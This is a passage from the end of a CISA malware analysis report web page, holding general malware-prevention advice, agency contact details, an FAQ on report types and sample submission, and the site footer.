restrict access to sites with unfavorable content. * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.). * Scan all software downloaded from the Internet prior to executing. * Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs). Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops". CONTACT INFORMATION * 1-888-282-0870 * NCCICCustomerService@us-cert.gov(link sends email) (UNCLASS) * us-cert@dhs.sgov.gov(link sends email) (SIPRNET) * us-cert@dhs.ic.gov(link sends email) (JWICS) CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/ DOCUMENT FAQ What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov(link sends email). Can I submit malware to CISA? Malware samples can be submitted via three methods: * Web: https://malware.us-cert.gov * E-Mail: submit@malware.us-cert.gov(link sends email) * FTP: ftp.malware.us-cert.gov (anonymous) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov. REVISIONS May 12, 2020: Initial version This product is provided subject to this Notification and this Privacy & Use policy. PLEASE SHARE YOUR THOUGHTS We recently updated our anonymous product survey; we’d welcome your feedback. Return to top * Topics * Spotlight * Resources & Tools * News & Events * Careers * About Cybersecurity & Infrastructure Security Agency * Facebook * Twitter * LinkedIn * YouTube * Instagram * RSS CISA Central 1-844-Say-CISA SayCISA@cisa.dhs.gov DHS Seal CISA.gov An official website of the U.S. Department of Homeland Security * About CISA * Budget and Performance * DHS.gov * Equal Opportunity & Accessibility * FOIA Requests * No FEAR Act * Office of Inspector General * Privacy Policy * Subscribe * The White House * USA.gov * Website Feedback